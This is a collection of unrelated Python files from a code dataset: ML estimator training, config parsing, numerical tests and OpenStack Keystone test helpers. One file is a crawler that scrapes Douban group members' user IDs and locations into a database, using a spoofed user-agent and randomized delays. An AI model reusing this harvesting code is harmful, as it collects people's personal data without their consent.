self.callback = callback
def __call__(self, source):
if source.successful():
self.callback(source.value)
def __hash__(self):
return hash(self.callback)
def __eq__(self, other):
return self.callback == getattr(other, 'callback', other)
def __str__(self):
return str(self.callback)
def __repr__(self):
return repr(self.callback)
def __getattr__(self, item):
assert item != 'callback'
return getattr(self.callback, item)
| 2.953125 | 3 |
lecarb/estimator/lw/lw_tree.py | anshumandutt/AreCELearnedYet | 34 | 6978 | <gh_stars>10-100
import time
import logging
from typing import Dict, Any, Tuple
import pickle
import numpy as np
import xgboost as xgb
from .common import load_lw_dataset, encode_query, decode_label
from ..postgres import Postgres
from ..estimator import Estimator
from ..utils import evaluate, run_test
from ...dataset.dataset import load_table
from ...workload.workload import Query
from ...constants import MODEL_ROOT, NUM_THREADS, PKL_PROTO
L = logging.getLogger(__name__)
class Args:
def __init__(self, **kwargs):
self.trees = 16
self.bins = 200
self.train_num = 10000
# overwrite parameters from user
self.__dict__.update(kwargs)
def train_lw_tree(seed, dataset, version, workload, params, sizelimit):
np.random.seed(seed)
# convert parameter dict of lw(nn)
L.info(f"params: {params}")
args = Args(**params)
valid_num = args.train_num // 10
table = load_table(dataset, version)
dataset = load_lw_dataset(table, workload, seed, args.bins)
train_X, train_y, _ = dataset['train']
valid_X, valid_y, valid_gt = dataset['valid']
# Train model
model_path = MODEL_ROOT / table.dataset
model_path.mkdir(parents=True, exist_ok=True)
model_file = model_path / f"{table.version}_{workload}-lwxgb_tr{args.trees}_bin{args.bins}_{args.train_num//1000}k-{seed}.pkl"
L.info(f"Start training...")
start_stmp = time.time()
model = xgb.XGBRegressor(objective='reg:squarederror', n_estimators=args.trees, random_state=seed, n_jobs=NUM_THREADS)
model.fit(train_X[:args.train_num], train_y[:args.train_num], eval_set=[(valid_X[:valid_num], valid_y[:valid_num])])
dur_min = (time.time() - start_stmp) / 60
L.info(f"Finish training, time since start: {dur_min:.4f} mins")
L.info(f"Run on valid set...")
preds = np.maximum(np.round(decode_label(model.predict(valid_X[:valid_num]))), 0.0)
gts = valid_gt[:valid_num]
L.info("Q-Error on validation set:")
_, metrics = evaluate(preds, gts)
state = {
'seed': seed,
'args': args,
'device': 'cpu',
'threads': NUM_THREADS,
'dataset': table.dataset,
'version': table.version,
'workload': workload,
'model': model,
'train_time': dur_min,
'valid_error': {workload: metrics}
# 'model_size': model_size,
}
with open(model_file, 'wb') as f:
pickle.dump(state, f, protocol=PKL_PROTO)
L.info(f'All finished! Time spent since training start: {(time.time()-start_stmp)/60:.2f} mins')
L.info(f"Model saved to {model_file}")
class LWTree(Estimator):
def __init__(self, model, model_name, pg_est, table):
super(LWTree, self).__init__(table=table, model=model_name)
self.model = model
self.pg_est = pg_est
def query(self, query):
if isinstance(query, Query):
query = encode_query(self.table, query, self.pg_est)
return self.query_vector(np.expand_dims(query, axis=0))
def query_vector(self, vec):
start_stmp = time.time()
pred = self.model.predict(vec).item()
dur_ms = (time.time() - start_stmp) * 1e3
return np.maximum(np.round(decode_label(pred)), 0.0), dur_ms
def load_lw_tree(dataset: str, model_name: str) -> Tuple[Estimator, Dict[str, Any]]:
model_file = MODEL_ROOT / dataset / f"{model_name}.pkl"
L.info(f"load model from {model_file} ...")
with open(model_file, 'rb') as f:
state = pickle.load(f)
# load model
args = state['args']
model = state['model']
table = load_table(dataset, state['version'])
pg_est = Postgres(table, args.bins, state['seed'])
estimator = LWTree(model, model_name, pg_est, table)
return estimator, state
def test_lw_tree(dataset: str, version: str, workload: str, params: Dict[str, Any], overwrite: bool) -> None:
"""
params:
model: model file name
use_cache: load processed vectors directly instead of build from queries
"""
# uniform thread number
model_file = MODEL_ROOT / dataset / f"{params['model']}.pkl"
L.info(f"Load model from {model_file} ...")
with open(model_file, 'rb') as f:
state = pickle.load(f)
# load corresonding version of table
table = load_table(dataset, state['version'])
# load model
args = state['args']
model = state['model']
pg_est = Postgres(table, args.bins, state['seed'])
estimator = LWTree(model, params['model'], pg_est, table)
L.info(f"Load and built lw(tree) estimator: {estimator}")
if params['use_cache']:
# test table might has different version with train
test_table = load_table(dataset, version)
lw_dataset = load_lw_dataset(test_table, workload, state['seed'], args.bins)
X, _, gt = lw_dataset['test']
run_test(dataset, version, workload, estimator, overwrite, lw_vec=(X, gt))
else:
run_test(dataset, version, workload, estimator, overwrite)
| 2.125 | 2 |
fsim/utils.py | yamasampo/fsim | 0 | 6979 |
import os
import configparser
from warnings import warn
def read_control_file(control_file):
# Initialize ConfigParser object
config = configparser.ConfigParser(
strict=True,
comment_prefixes=('/*', ';', '#'),
inline_comment_prefixes=('/*', ';', '#')
)
# Parse control file
paths = config.read(control_file)
# Check number of read control files.
if len(paths) == 0:
raise FileNotFoundError(
f'Specified control file, {control_file}, is not found.')
elif len(paths) > 1:
raise TypeError(f'Iterable {type(control_file)} is given as a control '\
'file. Only one control file is supported.')
# Check sections. Only 'REQUIRED' and 'OPTIONAL' sections will be used.
assert 'REQUIRED' in config.sections(), \
f'REQUIRED section is not found in {control_file}.'
expected_sections = ['REQUIRED', 'OPTIONAL']
not_expected_sections = [
s for s in config.sections() if s not in expected_sections]
if len(not_expected_sections) >= 1:
msg = f'Unexpected sections, {", ".join(not_expected_sections)}, '\
'were found. These are not used in '\
'the analysis. If you wish to include in the analysis, please '\
'specify in "REQUIRED" or "OPTIONAL" sections.'
warn(msg)
converters_d = {
'pop_size': int,
'ns': float,
'init_mut_num': int,
'generation_num': int,
'total_site_num': int,
'var_site_num': int,
'poly_site_num': int,
'fix_site_num': int,
'output_only_fixation': lambda s: True if s == 'True' else (False if s == 'False' else -9)
}
flattened = [
(opt, converters_d[opt](v))
if opt in converters_d.keys() else (opt, v)
for s in expected_sections
for opt, v in config[s].items()
]
return dict(flattened)
def write_info_to_file(file_handle, separator, *args, **kw_args):
""" Write arguments or keyword arguments to a file. Values will be
separated by a given separator.
"""
output_lines = []
if len(args) > 0:
output_lines.append(separator.join(args))
if len(kw_args) > 0:
for k, v in kw_args.items():
output_lines.append(f'{k}{separator}{v}')
print('\n'.join(output_lines), file=file_handle)
def write_settings(file_handle, **kw_args):
print('[Setting]', file=file_handle)
write_info_to_file(file_handle, separator=' = ', **kw_args)
| 2.6875 | 3 |
src/pymortests/function.py | mahgadalla/pymor | 1 | 6980 | # This file is part of the pyMOR project (http://www.pymor.org).
# Copyright 2013-2017 pyMOR developers and contributors. All rights reserved.
# License: BSD 2-Clause License (http://opensource.org/licenses/BSD-2-Clause)
import numpy as np
import pytest
from pymor.core.pickle import dumps, loads
from pymor.functions.basic import ConstantFunction, GenericFunction
from pymortests.fixtures.function import function, picklable_function, function_argument
from pymortests.fixtures.parameter import parameters_of_type
from pymortests.pickling import assert_picklable, assert_picklable_without_dumps_function
# monkey np.testing.assert_allclose to behave the same as np.allclose
# for some reason, the default atol of np.testing.assert_allclose is 0
# while it is 1e-8 for np.allclose
real_assert_allclose = np.testing.assert_allclose
def monkey_allclose(a, b, rtol=1.e-5, atol=1.e-8):
real_assert_allclose(a, b, rtol=rtol, atol=atol)
np.testing.assert_allclose = monkey_allclose
def test_evaluate(function):
f = function
mus = parameters_of_type(f.parameter_type, 4711)
for count in [0, 1, 5, (0, 1), (2, 2, 2)]:
arg = function_argument(f, count, 454)
result = f.evaluate(arg, next(mus))
assert result.shape == arg.shape[:-1] + f.shape_range
def test_lincomb_function():
for steps in (1, 10):
x = np.linspace(0, 1, num=steps)
zero = ConstantFunction(0.0, dim_domain=steps)
for zero in (ConstantFunction(0.0, dim_domain=steps),
GenericFunction(lambda X: np.zeros(X.shape[:-1]), dim_domain=steps)):
for one in (ConstantFunction(1.0, dim_domain=steps),
GenericFunction(lambda X: np.ones(X.shape[:-1]), dim_domain=steps), 1.0):
add = (zero + one) + 0
sub = (zero - one) + np.zeros(())
neg = - zero
assert np.allclose(sub(x), [-1])
assert np.allclose(add(x), [1.0])
assert np.allclose(neg(x), [0.0])
(repr(add), str(add), repr(one), str(one)) # just to cover the respective special funcs too
mul = neg * 1.
assert np.allclose(mul(x), [0.0])
with pytest.raises(AssertionError):
zero + ConstantFunction(dim_domain=steps + 1)
with pytest.raises(AssertionError):
zero * ConstantFunction(dim_domain=steps)
with pytest.raises(AssertionError):
ConstantFunction(dim_domain=0)
def test_pickle(function):
assert_picklable(function)
def test_pickle_without_dumps_function(picklable_function):
assert_picklable_without_dumps_function(picklable_function)
def test_pickle_by_evaluation(function):
f = function
f2 = loads(dumps(f))
mus = parameters_of_type(f.parameter_type, 47)
for arg in function_argument(f, 10, 42):
mu = next(mus)
assert np.all(f.evaluate(arg, mu) == f2.evaluate(arg, mu))
| 2.25 | 2 |
Code/userIDCrawler.py | CarberZ/social-media-mining | 2 | 6981 | <reponame>CarberZ/social-media-mining
'''
step 1
get the userID and their locations
put them all into a database
'''
from bs4 import BeautifulSoup
import urllib
import sqlite3
from selenium import webdriver
import time
import re
from urllib import request
import random
import pickle
import os
import pytesseract
url_dog = "https://www.douban.com/group/lovelydog/members?start="
url_cat = "https://www.douban.com/group/cat/members?start="
'''
cat = 1 ~ 336770
dog = 1 ~ 156240
'''
class getInfo(object):
memberList = []
type = None
url = None
memberNumber = 0
conn = None
cursor = None
def __init__(self, type):
getInfo.type = type
if type == "cat":
getInfo.url = url_cat
getInfo.memberNumber = 336770
else:
getInfo.url = url_dog
getInfo.memberNumber = 156240
dbName = "CDPeopleDB.sqlite"
#iniate the start point
if not os.path.isfile('stopPoint.pickle'):
with open('stopPoint.pickle', 'rb') as file:
pickle.dump(1, file)
conn = sqlite3.connect(dbName)
getInfo.conn = conn
getInfo.cursor = getInfo.conn.cursor()
# if getInfo.type == 'dog':
# getInfo.cursor.execute("drop table if exists DogPeople")
# getInfo.cursor.execute("create table DogPeople(id varchar(48), location varchar(48))")
# else:
# getInfo.cursor.execute("drop table if exists CatPeople")
# getInfo.cursor.execute("create table CatPeople(id varchar(48), location varchar(48))")
def sliceContent(self, pageContent):
pageContent = re.sub(r"<ul>(.*)</ul>", "\\1", pageContent.replace("\n", ""))
# print(pageContent)
memberList = re.sub(r'<li class=""> (.*?) </li>', "\\1mark", pageContent.strip())
memberList = re.split(r"mark", memberList)
inforContent = re.findall(r'<div class="name">(.*?)</div>', memberList[35])
for member in memberList:
if member.strip() != '':
inforContent = re.findall(r'<div class="name">(.*?)</div>', member)
if len(inforContent)!= 0:
inforContent = inforContent[0].strip()
identity = re.findall(r'https://www.douban.com/people/(.*?)/', inforContent)[0]
if len(identity)!=0:
id = identity[0]
location = re.findall(r'<span class="pl">\((.*?)\)</span>', inforContent)
if len(location) != 0:
coordinate = str(location[0])
else:
coordinate = 'Unknown'
else:
continue
if getInfo.type == 'dog':
getInfo.cursor.execute("insert into DogPeople values(?, ?)", (id, coordinate))
else:
getInfo.cursor.execute("insert into CatPeople values(?, ?)", (id, coordinate))
getInfo.conn.commit()
def crawler(self):
opener = urllib.request.build_opener(urllib.request.HTTPSHandler)
header = ("User-Agent",
" Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36")
opener.addheaders = [header]
driver = webdriver.Chrome()
driver.get(getInfo.url)
time.sleep(20)
#store the current position in case there is something wrong with the crawlering
with open('stopPoint.pickle', 'rb') as file:
startPoint = pickle.load(file)
#use the record to be the start position
for i in range(startPoint, getInfo.memberNumber, 35):
driver.get(getInfo.url+str(i))
page = driver.page_source
soup = BeautifulSoup(page, "html5lib")
print(i)
with open('stopPoint.pickle', 'wb') as file:
pickle.dump(i, file)
memberList = soup.find('div', {'class': 'member-list'}).ul
content = str(memberList)
getInfo.sliceContent(self, pageContent=content)
time.sleep(2+random.random())
# info_dog = getInfo("dog")
# info_dog.crawler()
info_cat = getInfo("cat")
info_cat.crawler()
'''
create table CatPeople
as
select distinct *
from CatPeople_backup
WHERE not location GLOB '*[A-Za-z]*';
pre-processing to delete locations out of China
'''
| 2.9375 | 3 |
src/stoat/core/structure/__init__.py | saarkatz/guppy-struct | 1 | 6982 | <gh_stars>1-10
from .structure import Structure
| 1.039063 | 1 |
tbase/network/polices_test.py | iminders/TradeBaselines | 16 | 6983 | <reponame>iminders/TradeBaselines<filename>tbase/network/polices_test.py
import unittest
import numpy as np
from tbase.common.cmd_util import set_global_seeds
from tbase.network.polices import RandomPolicy
class TestPolices(unittest.TestCase):
@classmethod
def setUpClass(self):
set_global_seeds(0)
def test_random_policy(self):
policy = RandomPolicy(2)
# action 1
actual = policy.select_action([])
expected = [1.0, -0.2534131770209437]
self.assertEqual(expected, list(actual.astype(np.float)))
# action 2
actual = policy.select_action([])
expected = [-1.0, 0.8324962832376306]
self.assertEqual(expected, list(actual.astype(np.float)))
if __name__ == '__main__':
unittest.main()
| 2.4375 | 2 |
keystone/tests/unit/core.py | knikolla/keystone | 0 | 6984 | # Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import atexit
import base64
import contextlib
import datetime
import functools
import hashlib
import json
import ldap
import os
import shutil
import socket
import sys
import uuid
import warnings
import fixtures
import flask
from flask import testing as flask_testing
import http.client
from oslo_config import fixture as config_fixture
from oslo_context import context as oslo_context
from oslo_context import fixture as oslo_ctx_fixture
from oslo_log import fixture as log_fixture
from oslo_log import log
from oslo_utils import timeutils
from sqlalchemy import exc
import testtools
from testtools import testcase
import keystone.api
from keystone.common import context
from keystone.common import json_home
from keystone.common import provider_api
from keystone.common import sql
import keystone.conf
from keystone import exception
from keystone.identity.backends.ldap import common as ks_ldap
from keystone import notifications
from keystone.resource.backends import base as resource_base
from keystone.server.flask import application as flask_app
from keystone.server.flask import core as keystone_flask
from keystone.tests.unit import ksfixtures
keystone.conf.configure()
keystone.conf.set_config_defaults()
PID = str(os.getpid())
TESTSDIR = os.path.dirname(os.path.abspath(__file__))
TESTCONF = os.path.join(TESTSDIR, 'config_files')
ROOTDIR = os.path.normpath(os.path.join(TESTSDIR, '..', '..', '..'))
VENDOR = os.path.join(ROOTDIR, 'vendor')
ETCDIR = os.path.join(ROOTDIR, 'etc')
def _calc_tmpdir():
env_val = os.environ.get('KEYSTONE_TEST_TEMP_DIR')
if not env_val:
return os.path.join(TESTSDIR, 'tmp', PID)
return os.path.join(env_val, PID)
TMPDIR = _calc_tmpdir()
CONF = keystone.conf.CONF
PROVIDERS = provider_api.ProviderAPIs
log.register_options(CONF)
IN_MEM_DB_CONN_STRING = 'sqlite://'
# Strictly matches ISO 8601 timestamps with subsecond precision like:
# 2016-06-28T20:48:56.000000Z
TIME_FORMAT = '%Y-%m-%dT%H:%M:%S.%fZ'
TIME_FORMAT_REGEX = r'^\d{4}-[0-1]\d-[0-3]\dT[0-2]\d:[0-5]\d:[0-5]\d\.\d{6}Z$'
exception._FATAL_EXCEPTION_FORMAT_ERRORS = True
os.makedirs(TMPDIR)
atexit.register(shutil.rmtree, TMPDIR)
class dirs(object):
@staticmethod
def root(*p):
return os.path.join(ROOTDIR, *p)
@staticmethod
def etc(*p):
return os.path.join(ETCDIR, *p)
@staticmethod
def tests(*p):
return os.path.join(TESTSDIR, *p)
@staticmethod
def tmp(*p):
return os.path.join(TMPDIR, *p)
@staticmethod
def tests_conf(*p):
return os.path.join(TESTCONF, *p)
@atexit.register
def remove_test_databases():
db = dirs.tmp('test.db')
if os.path.exists(db):
os.unlink(db)
pristine = dirs.tmp('test.db.pristine')
if os.path.exists(pristine):
os.unlink(pristine)
def skip_if_cache_disabled(*sections):
"""Skip a test if caching is disabled, this is a decorator.
Caching can be disabled either globally or for a specific section.
In the code fragment::
@skip_if_cache_is_disabled('assignment', 'token')
def test_method(*args):
...
The method test_method would be skipped if caching is disabled globally via
the `enabled` option in the `cache` section of the configuration or if
the `caching` option is set to false in either `assignment` or `token`
sections of the configuration. This decorator can be used with no
arguments to only check global caching.
If a specified configuration section does not define the `caching` option,
this decorator makes the caching enabled if `enabled` option in the `cache`
section of the configuration is true.
"""
def wrapper(f):
@functools.wraps(f)
def inner(*args, **kwargs):
if not CONF.cache.enabled:
raise testcase.TestSkipped('Cache globally disabled.')
for s in sections:
conf_sec = getattr(CONF, s, None)
if conf_sec is not None:
if not getattr(conf_sec, 'caching', True):
raise testcase.TestSkipped('%s caching disabled.' % s)
return f(*args, **kwargs)
return inner
return wrapper
def skip_if_cache_is_enabled(*sections):
def wrapper(f):
@functools.wraps(f)
def inner(*args, **kwargs):
if CONF.cache.enabled:
for s in sections:
conf_sec = getattr(CONF, s, None)
if conf_sec is not None:
if getattr(conf_sec, 'caching', True):
raise testcase.TestSkipped('%s caching enabled.' %
s)
return f(*args, **kwargs)
return inner
return wrapper
def skip_if_no_multiple_domains_support(f):
"""Decorator to skip tests for identity drivers limited to one domain."""
@functools.wraps(f)
def wrapper(*args, **kwargs):
test_obj = args[0]
if not test_obj.identity_api.multiple_domains_supported:
raise testcase.TestSkipped('No multiple domains support')
return f(*args, **kwargs)
return wrapper
class UnexpectedExit(Exception):
pass
def new_region_ref(parent_region_id=None, **kwargs):
ref = {
'id': uuid.uuid4().hex,
'description': uuid.uuid4().hex,
'parent_region_id': parent_region_id}
ref.update(kwargs)
return ref
def new_service_ref(**kwargs):
ref = {
'id': uuid.uuid4().hex,
'name': uuid.uuid4().hex,
'description': uuid.uuid4().hex,
'enabled': True,
'type': uuid.uuid4().hex,
}
ref.update(kwargs)
return ref
NEEDS_REGION_ID = object()
def new_endpoint_ref(service_id, interface='public',
region_id=NEEDS_REGION_ID, **kwargs):
ref = {
'id': uuid.uuid4().hex,
'name': uuid.uuid4().hex,
'description': uuid.uuid4().hex,
'interface': interface,
'service_id': service_id,
'url': 'https://' + uuid.uuid4().hex + '.com',
}
if region_id is NEEDS_REGION_ID:
ref['region_id'] = uuid.uuid4().hex
elif region_id is None and kwargs.get('region') is not None:
# pre-3.2 form endpoints are not supported by this function
raise NotImplementedError("use new_endpoint_ref_with_region")
else:
ref['region_id'] = region_id
ref.update(kwargs)
return ref
def new_endpoint_group_ref(filters, **kwargs):
ref = {
'id': uuid.uuid4().hex,
'description': uuid.uuid4().hex,
'filters': filters,
'name': uuid.uuid4().hex
}
ref.update(kwargs)
return ref
def new_endpoint_ref_with_region(service_id, region, interface='public',
**kwargs):
"""Define an endpoint_ref having a pre-3.2 form.
Contains the deprecated 'region' instead of 'region_id'.
"""
ref = new_endpoint_ref(service_id, interface, region=region,
region_id='invalid', **kwargs)
del ref['region_id']
return ref
def new_domain_ref(**kwargs):
ref = {
'id': uuid.uuid4().hex,
'name': uuid.uuid4().hex,
'description': uuid.uuid4().hex,
'enabled': True,
'tags': [],
'options': {}
}
ref.update(kwargs)
return ref
def new_project_ref(domain_id=None, is_domain=False, **kwargs):
ref = {
'id': uuid.uuid4().hex,
'name': uuid.uuid4().hex,
'description': uuid.uuid4().hex,
'enabled': True,
'domain_id': domain_id,
'is_domain': is_domain,
'tags': [],
'options': {}
}
# NOTE(henry-nash): We don't include parent_id in the initial list above
# since specifying it is optional depending on where the project sits in
# the hierarchy (and a parent_id of None has meaning - i.e. it's a top
# level project).
ref.update(kwargs)
return ref
def new_user_ref(domain_id, project_id=None, **kwargs):
ref = {
'id': uuid.uuid4().hex,
'name': uuid.uuid4().hex,
'enabled': True,
'domain_id': domain_id,
'email': uuid.uuid4().hex,
'password': <PASSWORD>,
}
if project_id:
ref['default_project_id'] = project_id
ref.update(kwargs)
return ref
def new_federated_user_ref(idp_id=None, protocol_id=None, **kwargs):
ref = {
'idp_id': idp_id or 'ORG_IDP',
'protocol_id': protocol_id or 'saml2',
'unique_id': uuid.uuid4().hex,
'display_name': uuid.uuid4().hex,
}
ref.update(kwargs)
return ref
def new_mapping_ref(mapping_id=None, rules=None, **kwargs):
ref = {
'id': mapping_id or uuid.uuid4().hex,
'rules': rules or []
}
ref.update(kwargs)
return ref
def new_protocol_ref(protocol_id=None, idp_id=None, mapping_id=None, **kwargs):
ref = {
'id': protocol_id or 'saml2',
'idp_id': idp_id or 'ORG_IDP',
'mapping_id': mapping_id or uuid.uuid4().hex
}
ref.update(kwargs)
return ref
def new_identity_provider_ref(idp_id=None, **kwargs):
ref = {
'id': idp_id or 'ORG_IDP',
'enabled': True,
'description': '',
}
ref.update(kwargs)
return ref
def new_service_provider_ref(**kwargs):
ref = {
'auth_url': 'https://' + uuid.uuid4().hex + '.com',
'enabled': True,
'description': uuid.uuid4().hex,
'sp_url': 'https://' + uuid.uuid4().hex + '.com',
'relay_state_prefix': CONF.saml.relay_state_prefix
}
ref.update(kwargs)
return ref
def new_group_ref(domain_id, **kwargs):
ref = {
'id': uuid.uuid4().hex,
'name': uuid.uuid4().hex,
'description': uuid.uuid4().hex,
'domain_id': domain_id
}
ref.update(kwargs)
return ref
def new_credential_ref(user_id, project_id=None, type='cert', **kwargs):
ref = {
'id': uuid.uuid4().hex,
'user_id': user_id,
'type': type,
}
if project_id:
ref['project_id'] = project_id
if 'blob' not in kwargs:
ref['blob'] = uuid.uuid4().hex
ref.update(kwargs)
return ref
def new_cert_credential(user_id, project_id=None, blob=None, **kwargs):
if blob is None:
blob = {'access': uuid.uuid4().hex, 'secret': uuid.uuid4().hex}
credential = new_credential_ref(user_id=user_id,
project_id=project_id,
blob=json.dumps(blob),
type='cert',
**kwargs)
return blob, credential
def new_ec2_credential(user_id, project_id=None, blob=None, **kwargs):
if blob is None:
blob = {
'access': uuid.uuid4().hex,
'secret': uuid.uuid4().hex,
'trust_id': None
}
if 'id' not in kwargs:
access = blob['access'].encode('utf-8')
kwargs['id'] = hashlib.sha256(access).hexdigest()
credential = new_credential_ref(user_id=user_id,
project_id=project_id,
blob=json.dumps(blob),
type='ec2',
**kwargs)
return blob, credential
def new_totp_credential(user_id, project_id=None, blob=None):
if not blob:
# NOTE(notmorgan): 20 bytes of data from os.urandom for
# a totp secret.
blob = base64.b32encode(os.urandom(20)).decode('utf-8')
credential = new_credential_ref(user_id=user_id,
project_id=project_id,
blob=blob,
type='totp')
return credential
def new_application_credential_ref(roles=None,
name=None,
expires=None,
secret=None):
ref = {
'id': uuid.uuid4().hex,
'name': uuid.uuid4().hex,
'description': uuid.uuid4().hex,
}
if roles:
ref['roles'] = roles
if secret:
ref['secret'] = secret
if isinstance(expires, str):
ref['expires_at'] = expires
elif isinstance(expires, dict):
ref['expires_at'] = (
timeutils.utcnow() + datetime.timedelta(**expires)
).strftime(TIME_FORMAT)
elif expires is None:
pass
else:
raise NotImplementedError('Unexpected value for "expires"')
return ref
def new_role_ref(**kwargs):
ref = {
'id': uuid.uuid4().hex,
'name': uuid.uuid4().hex,
'description': uuid.uuid4().hex,
'domain_id': None,
'options': {},
}
ref.update(kwargs)
return ref
def new_policy_ref(**kwargs):
ref = {
'id': uuid.uuid4().hex,
'name': uuid.uuid4().hex,
'description': uuid.uuid4().hex,
'enabled': True,
# Store serialized JSON data as the blob to mimic real world usage.
'blob': json.dumps({'data': uuid.uuid4().hex, }),
'type': uuid.uuid4().hex,
}
ref.update(kwargs)
return ref
def new_domain_config_ref(**kwargs):
ref = {
"identity": {
"driver": "ldap"
},
"ldap": {
"url": "ldap://myldap.com:389/",
"user_tree_dn": "ou=Users,dc=my_new_root,dc=org"
}
}
ref.update(kwargs)
return ref
def new_trust_ref(trustor_user_id, trustee_user_id, project_id=None,
impersonation=None, expires=None, role_ids=None,
role_names=None, remaining_uses=None,
allow_redelegation=False, redelegation_count=None, **kwargs):
ref = {
'id': uuid.uuid4().hex,
'trustor_user_id': trustor_user_id,
'trustee_user_id': trustee_user_id,
'impersonation': impersonation or False,
'project_id': project_id,
'remaining_uses': remaining_uses,
'allow_redelegation': allow_redelegation,
}
if isinstance(redelegation_count, int):
ref.update(redelegation_count=redelegation_count)
if isinstance(expires, str):
ref['expires_at'] = expires
elif isinstance(expires, dict):
ref['expires_at'] = (
timeutils.utcnow() + datetime.timedelta(**expires)
).strftime(TIME_FORMAT)
elif expires is None:
pass
else:
raise NotImplementedError('Unexpected value for "expires"')
role_ids = role_ids or []
role_names = role_names or []
if role_ids or role_names:
ref['roles'] = []
for role_id in role_ids:
ref['roles'].append({'id': role_id})
for role_name in role_names:
ref['roles'].append({'name': role_name})
ref.update(kwargs)
return ref
def new_registered_limit_ref(**kwargs):
ref = {
'service_id': uuid.uuid4().hex,
'resource_name': uuid.uuid4().hex,
'default_limit': 10,
'description': uuid.uuid4().hex
}
ref.update(kwargs)
return ref
def new_limit_ref(**kwargs):
ref = {
'service_id': uuid.uuid4().hex,
'resource_name': uuid.uuid4().hex,
'resource_limit': 10,
'description': uuid.uuid4().hex
}
ref.update(kwargs)
return ref
def create_user(api, domain_id, **kwargs):
"""Create a user via the API. Keep the created password.
The password is saved and restored when api.create_user() is called.
Only use this routine if there is a requirement for the user object to
have a valid password after api.create_user() is called.
"""
user = new_user_ref(domain_id=domain_id, **kwargs)
password = user['password']
user = api.create_user(user)
user['password'] = password
return user
def _assert_expected_status(f):
"""Add `expected_status_code` as an argument to the test_client methods.
`expected_status_code` must be passed as a kwarg.
"""
TEAPOT_HTTP_STATUS = 418
_default_expected_responses = {
'get': http.client.OK,
'head': http.client.OK,
'post': http.client.CREATED,
'put': http.client.NO_CONTENT,
'patch': http.client.OK,
'delete': http.client.NO_CONTENT,
}
@functools.wraps(f)
def inner(*args, **kwargs):
# Get the "expected_status_code" kwarg if supplied. If not supplied use
# the `_default_expected_response` mapping, or fall through to
# "HTTP OK" if the method is somehow unknown.
expected_status_code = kwargs.pop(
'expected_status_code',
_default_expected_responses.get(
f.__name__.lower(), http.client.OK))
response = f(*args, **kwargs)
# Logic to verify the response object is sane. Expand as needed
if response.status_code == TEAPOT_HTTP_STATUS:
# NOTE(morgan): We use 418 internally during tests to indicate
# an un-routed HTTP call was made. This allows us to avoid
# misinterpreting HTTP 404 from Flask and HTTP 404 from a
# resource that is not found (e.g. USER NOT FOUND) programmatically
raise AssertionError("I AM A TEAPOT(418): %s" % response.data)
if response.status_code != expected_status_code:
raise AssertionError(
'Expected HTTP Status does not match observed HTTP '
'Status: %(expected)s != %(observed)s (%(data)s)' % {
'expected': expected_status_code,
'observed': response.status_code,
'data': response.data})
# return the original response object
return response
return inner
class KeystoneFlaskTestClient(flask_testing.FlaskClient):
"""Subclass of flask.testing.FlaskClient implementing assertions.
Implements custom "expected" HTTP Status assertion for
GET/HEAD/PUT/PATCH/DELETE.
"""
@_assert_expected_status
def get(self, *args, **kwargs):
return super(KeystoneFlaskTestClient, self).get(*args, **kwargs)
@_assert_expected_status
def head(self, *args, **kwargs):
return super(KeystoneFlaskTestClient, self).head(*args, **kwargs)
@_assert_expected_status
def post(self, *args, **kwargs):
return super(KeystoneFlaskTestClient, self).post(*args, **kwargs)
@_assert_expected_status
def patch(self, *args, **kwargs):
return super(KeystoneFlaskTestClient, self).patch(*args, **kwargs)
@_assert_expected_status
def put(self, *args, **kwargs):
return super(KeystoneFlaskTestClient, self).put(*args, **kwargs)
@_assert_expected_status
def delete(self, *args, **kwargs):
return super(KeystoneFlaskTestClient, self).delete(*args, **kwargs)
class BaseTestCase(testtools.TestCase):
"""Light weight base test class.
This is a placeholder that will eventually go away once the
setup/teardown in TestCase is properly trimmed down to the bare
essentials. This is really just a play to speed up the tests by
eliminating unnecessary work.
"""
def setUp(self):
super(BaseTestCase, self).setUp()
self.useFixture(fixtures.NestedTempfile())
self.useFixture(fixtures.TempHomeDir())
self.useFixture(fixtures.MockPatchObject(sys, 'exit',
side_effect=UnexpectedExit))
self.useFixture(log_fixture.get_logging_handle_error_fixture())
warnings.filterwarnings('error', category=DeprecationWarning,
module='^keystone\\.')
warnings.filterwarnings(
'ignore', category=DeprecationWarning,
message=r"Using function/method 'db_version\(\)' is deprecated")
warnings.simplefilter('error', exc.SAWarning)
if hasattr(exc, "RemovedIn20Warning"):
warnings.simplefilter('ignore', exc.RemovedIn20Warning)
self.addCleanup(warnings.resetwarnings)
# Ensure we have an empty threadlocal context at the start of each
# test.
self.assertIsNone(oslo_context.get_current())
self.useFixture(oslo_ctx_fixture.ClearRequestContext())
orig_debug_level = ldap.get_option(ldap.OPT_DEBUG_LEVEL)
self.addCleanup(ldap.set_option, ldap.OPT_DEBUG_LEVEL,
orig_debug_level)
orig_tls_cacertfile = ldap.get_option(ldap.OPT_X_TLS_CACERTFILE)
if orig_tls_cacertfile is None:
orig_tls_cacertfile = ''
self.addCleanup(ldap.set_option, ldap.OPT_X_TLS_CACERTFILE,
orig_tls_cacertfile)
orig_tls_cacertdir = ldap.get_option(ldap.OPT_X_TLS_CACERTDIR)
# Setting orig_tls_cacertdir to None is not allowed.
if orig_tls_cacertdir is None:
orig_tls_cacertdir = ''
self.addCleanup(ldap.set_option, ldap.OPT_X_TLS_CACERTDIR,
orig_tls_cacertdir)
orig_tls_require_cert = ldap.get_option(ldap.OPT_X_TLS_REQUIRE_CERT)
self.addCleanup(ldap.set_option, ldap.OPT_X_TLS_REQUIRE_CERT,
orig_tls_require_cert)
self.addCleanup(ks_ldap.PooledLDAPHandler.connection_pools.clear)
def cleanup_instance(self, *names):
"""Create a function suitable for use with self.addCleanup.
:returns: a callable that uses a closure to delete instance attributes
"""
def cleanup():
for name in names:
# TODO(dstanek): remove this 'if' statement once
# load_backend in test_backend_ldap is only called once
# per test
if hasattr(self, name):
delattr(self, name)
return cleanup
def skip_if_env_not_set(self, env_var):
if not os.environ.get(env_var):
self.skipTest('Env variable %s is not set.' % env_var)
def skip_test_overrides(self, *args, **kwargs):
